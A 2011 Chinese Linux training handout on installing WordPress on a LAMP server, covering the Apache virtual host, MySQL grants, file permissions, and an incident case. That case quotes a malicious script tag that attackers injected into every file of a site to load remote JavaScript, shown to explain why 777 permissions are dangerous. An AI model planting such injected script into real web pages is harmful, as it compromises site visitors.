#########################################################
#《老男孩linux就业培训中心-初级班第七期lamp服务内容总结。
#lamp环境实战操作建立完全属于自己的博客站点
#date:2011-06-11
#作者:《老男孩孩linux就业培训中心 》
#QQ:31333741 MAIL:oldboy521@hotmail.com
#blog: http://oldboy.blog.51cto.com
#psite: http://oldboy.cc(即将开放)
##########################################################
实战操作完全属于自己的博客站点
■前提准备工作
需要事先搭建lamp环境!
提示:lamp操作过程此处略过,详见老男孩linux培训中心lamp课程讲解。
虚拟主机配置如下:
<VirtualHost *:80>
ServerAdmin 31333741@qq.com
DocumentRoot "//var/blog"
ServerName blog.etiantian.org
ServerAlias etiantian.org
ErrorLog "logs/blog.etiantian.org-error_log"
CustomLog "logs/blog.etiantian.org-access_log" common
</VirtualHost>
提示:还可以配置日志轮询,详情见如下地址:
http://oldboy.blog.51cto.com/2561410/584513
■1、下载免费的开源的博客wordpress程序
官方中文地址:http://cn.wordpress.org/
wget http://cn.wordpress.org/wordpress-3.0.1-zh_CN.zip
unzip wordpress-3.0.1-zh_CN.zip
mv wordpress/* /var/blog/ #<--其中 /var/blog为blog站点根目录
■2、建立wordpress数据库及帐号
执行 mysql -uroot -p #<--登陆mysql
建立博客数据库
create database wordpress;
建立博客的帐号wordpress,设置密码为oldboy123 并授权管理wordpress这个库。
grant create,select,insert,update,delete on wordpress.* to 'wordpress'@localhost identified by 'oldboy123';
提示:安装blog后,记得要撤消create,保留select,insert,update,delete的授权
revoke create on wordpress.* from wordpress@'localhost';
很多初级朋友直接用root作为web连接帐号,这是很不规范的。而且权限太大。
提示:mysql命令行中的命令帮助 语法为help grant,help revoke
==========================================================
grant 用法:
功能:创建用户并赋予权限:
语法:
grant all privileges on dbname.* to username@localhost identified by ‘passwd′;
给localhost域的用户username管理dbname数据库的所有权限,密码为passwd。
其中username,dbname,passwd要根据自己的情况修改。
例:
mysql> grant all privileges on oldboy.* to 'oldboy'@'localhost' identified by 'oldboy';
Query OK, 0 rows affected (0.00 sec)
说明:这里表示给localhost域(表示本机)的用户oldboy管理oldboy数据库的所有表(*表示所有表)所有权限(all privileges),密码为oldboy。
==================================================
列一下建好的blog库信息:
库 :wordpress
用户:wordpress
密码:oldboy123
==================================================
创建完成就可以安装blog了。
■3、打开 http://blog.etiantian.org根据提示安装blog
在浏览器中访问 wp-admin/install.php。它将帮助您把数据库链接信息写入到
wp-config.php 文件中。
wp-admin/install.php 这里是个超链接,点击安装即可,也可直接输入
http://blog.etiantian.org/wp-admin/install.php:
■4、安装blog需要关注的两个地方
注意两个地方:
1、填写数据库、用户、及密码的地方。
2、注意站点目录的权限,一般产品环境最好不要 搞成777权限,
可授权apache 的用户和组给站点目录。
如:chown -R apache.apache /var/blog ,其中apache.apache为apache主配置文件中配置过的用户及组。
不过还有更好的设置站点目录权限的方法,见后文。
查看apache配置哪个用户的方法:
[root@mysql var]# egrep "User apache|Group apache" /application/apache/conf/httpd.conf
User apache
Group apache
安装完后,删除phpinfo.php,wp-admin/install.php等不安全的文件。
■5、博客站点目录的权限特殊设置(基于安全考虑的较严谨的设置)
cd /var
chown -R root.root /var/blog ===>为了安全仅给所有程序root属主与用户
mkdir -p wp-content/uploads ===>手动建,为了授权更高的权限
chown -R apache.apache wp-content/uploads/ ===>授权上传文件目录。
已经过测试,wordpress前端已禁止上传*.php *.sh *.bat等文件
另外:更严格一些设置,可以设置 wp-content/uploads禁止对php等脚本解析,
详细内容请见老男孩的有关lamp安全方面的总结
#################################################
若干年前老男孩曾经给企业做顾问时,某网站遭遇黑客
攻击,站点下面所有目录均被被嵌入一行黑客js代码。
#################################################
■6、被黑实际案例解读
某某网站web server BBS服务器站点目录所有文件均被被植入了JS代码:
<script language=javascript src=http://%64%72%6C/y.js?google_ad=90x25_ad></script>
进入:/usr/local/apache2/htdocs/www/ 查看 ,每一个文件(包括子目录)
(js,html,html,xml,php,css等)
------------------------------------------------------------------------------------------------------------
实际案例:
说明:站点目录文件被植入了如下内容:
<script language=javascript src=http://%64%72%6C/y.js?google_ad=90x25_ad></script>
提示:内容已被替换过。
问题原因:
开发经理将站点目录授权777 惹的祸。
防范方法:
下面的方法只针对于对用户来说变化的目录进行授权,其他所有程序目录及程序都只能是
root用户和组 755的权限,确保了安全。
■5、博客站点目录的权限特殊设置(基于安全考虑的较严谨的设置)
cd /var
chown -R root.root /var/blog ===>为了安全仅给所有程序root属主与用户
mkdir -p wp-content/uploads ===>手动建,为了授权更高的权限
chown -R apache.apache wp-content/uploads/ ===>授权上传文件目录。
已经过测试,wordpress前端已禁止上传*.php *.sh *.bat等文件
另外:更严格一些设置,可以设置 wp-content/uploads禁止对php等脚本解析,
详细内容请见老男孩的有关lamp安全方面的总结
■2011-6-11 作业:建立完全属于自己的论坛BBS站点
官方站点:
http://www.discuz.net/
程序下载地址:
http://download2.comsenz.com/DiscuzX/Discuz_X1_SC_UTF8.zip
请各位同学务必完成作业。不会的问题可以去群里讨论。
QQ群:37081784
■ 2011-6-12 课上考试:建立完全属于自己的CMS站点
2011-6-12
官方站点:
http://www.dedecms.com
程序下载:
完整版下载(含带所有模块):===>UTF-8版本
CMS是Content Management System的缩写,意为"内容管理系统",
它具有许多基于模板的优秀设计,可以加快网站开发的速度和减少开发的成本。
本文出自 “老男孩的linux博客” 博客,请务必保留此出处http://oldboy.blog.51cto.com/2561410/587414